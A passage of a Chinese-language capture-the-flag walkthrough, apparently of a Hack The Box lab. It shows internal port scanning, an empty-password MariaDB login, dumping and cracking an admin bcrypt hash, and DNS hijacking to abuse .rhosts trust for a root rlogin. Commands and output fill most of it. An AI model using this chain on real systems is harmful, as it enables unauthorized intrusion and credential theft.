尝试进行端口扫描,发现扫不了
root@5ac6c7d6fb8e:~# ./nmap 172.18.0.1-172.18.0.6
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-03 05:27 UTC
Unable to find nmap-services! Resorting to /etc/services
Unable to open /etc/services for reading service information
QUITTING!
传 Fscan 上去进行操作
root@5ac6c7d6fb8e:~# ./fscan -h 172.18.0.3/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.18.0.1 is alive
(icmp) Target 172.18.0.2 is alive
(icmp) Target 172.18.0.3 is alive
(icmp) Target 172.18.0.4 is alive
(icmp) Target 172.18.0.5 is alive
(icmp) Target 172.18.0.6 is alive
[*] Icmp alive hosts len is: 6
172.18.0.1:22 open
172.18.0.6:80 open
172.18.0.2:22 open
172.18.0.1:3306 open
172.18.0.4:3306 open
172.18.0.3:8080 open
172.18.0.5:8081 open
172.18.0.1:8081 open
172.18.0.2:3000 open
172.18.0.1:3000 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://172.18.0.1:8081 code:401 len:55 title:Unauthorized
[*] WebTitle http://172.18.0.1:3000 code:200 len:13998 title:Gitea: Git with a cup of tea
[*] WebTitle http://172.18.0.2:3000 code:200 len:13998 title:Gitea: Git with a cup of tea
[*] WebTitle http://172.18.0.6 code:302 len:199 title:Redirecting... 跳转url: http://172.18.0.6/login
[+] mysql 172.18.0.1:3306:root
[+] mysql 172.18.0.4:3306:root
[*] WebTitle http://172.18.0.5:8081 code:401 len:55 title:Unauthorized
[*] WebTitle http://172.18.0.6/login code:200 len:3837 title:Log In - PowerDNS-Admin
[+] InfoScan http://172.18.0.1:3000 [Gitea简易Git服务]
[+] InfoScan http://172.18.0.2:3000 [Gitea简易Git服务]
发现宿主机的mysql存在空密码登录
目标没有ssh服务,上传 Stowaway 做一个代理
root@5ac6c7d6fb8e:~# ./chisel server -p 1080 --socks5
2026/01/03 05:37:04 server: Fingerprint ztNAul48viej3zHiJchlWisAewwt7pUq2JUKdiZtSEo=
2026/01/03 05:37:04 server: Listening on http://0.0.0.0:1080
2.3. mysql 空密码
然后连接mysql看看
C:\Users\Administrator> mysql -h 172.18.0.4 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.09 sec)
mysql> use powerdnsadmin;
Database changed
mysql> show tables;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account |
| account_user |
| alembic_version |
| apikey |
| apikey_account |
| comments |
| cryptokeys |
| domain |
| domain_apikey |
| domain_setting |
| domain_template |
| domain_template_record |
| domain_user |
| domainmetadata |
| domains |
| history |
| records |
| role |
| sessions |
| setting |
| supermasters |
| tsigkeys |
| user |
+-------------------------+
23 rows in set (0.09 sec)
mysql> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.09 sec)
mysql> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name | master | type | serial | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| 1 | build.vl | [] | Native | 2024050201 | 0 | 0 | 0 | NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.09 sec)
mysql> select * from history;
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
| id | msg | detail | created_by | created_on | domain_id |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
| 1 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-01 15:54:31 | NULL |
| 2 | Add zone build.vl | {"domain_type": "native", "domain_master_ips": [], "account_id": "0"} | admin | 2024-05-01 15:54:43 | 1 |
| 3 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.19.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": []} | admin | 2024-05-01 15:56:57 | 1 |
| 4 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-01 16:32:24 | NULL |
| 5 | User admin authentication succeeded | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1} | System | 2024-05-02 10:07:19 | NULL |
| 6 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "db.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.4", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns-worker.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.5", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.6", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": [{"comments": [{"content": "", "account": ""}], "name": "jenkins.build.vl.", "records": [{"content": "172.20.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "pdns.build.vl.", "records": [{"content": "172.18.0.3", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "intern.build.vl.", "records": [{"content": "172.20.0.1", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "gitea.build.vl.", "records": [{"content": "172.19.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}]} | admin | 2024-05-02 10:13:52 | 1 |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
6 rows in set (0.09 sec)
mysql> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.10 sec)
里面有一个管理员的hash
$2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq:winston
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw...2.hsEq
Time.Started.....: Sat Jan 03 14:21:43 2026 (9 secs)
Time.Estimated...: Sat Jan 03 14:21:52 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 150 H/s (13.60ms) @ Accel:1 Loops:32 Thr:11 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1320/14344388 (0.01%)
Rejected.........: 0/1320 (0.00%)
Restore.Point....: 1056/14344388 (0.01%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:4064-4096
Candidate.Engine.: Device Generator
Candidates.#01...: sanchez -> kingkong
Hardware.Mon.#01.: Temp: 51c Util: 99% Core:2550MHz Mem:8001MHz Bus:8
密码 winston
2.4. DNS Hijacking
然后可以用这凭据登录到 http://172.18.0.6/
在这个后台我可以看到各个容器的ip和域名
因为fscan扫描的端口不全,我使用nmap重新扫描了一遍
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# proxychains -q nmap 172.18.0.1 -Pn -sT
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 01:29 EST
Nmap scan report for 172.18.0.1
Host is up (0.29s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
512/tcp open exec
>>>> 513/tcp open login
514/tcp open shell
873/tcp open rsync
3000/tcp open ppp
3306/tcp open mysql
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds
这里你可以发现目标开发了513端口,这是 Rlogin
还记得我们上面发现的 .rhosts文件吗
root@5ac6c7d6fb8e:~# cat .rhosts
admin.build.vl +
intern.build.vl +
他这里面记录了两个域名(意思是来自这两个域名的主机无需密码即可连接到本机器上),但是当前机器上是没有rhost服务的,所以这可能就是宿主机的 .rhosts 配置
现在我们只要修改二者任意一个dns解析,指向我们的kali,那么我们的kali也就无需密码即可通过rhost登录
这里我新建一个 admin.build.vl 的域名把他的DNS指向我们的kali ip
然后即可无密登录
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# rlogin 10.129.234.169
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-144-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Jan 3 06:51:20 AM UTC 2026
System load: 0.04 Processes: 192
Usage of /: 63.5% of 9.75GB Users logged in: 0
Memory usage: 32% IPv4 address for eth0: 10.129.234.169
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jan 3 06:51:20 UTC 2026 from 10.10.14.79 on pts/0
root@build:~# whoami;hostname
root
build
root@build:~# cat /root/root.txt
b7b1e48179891ea87e77b1f83bada971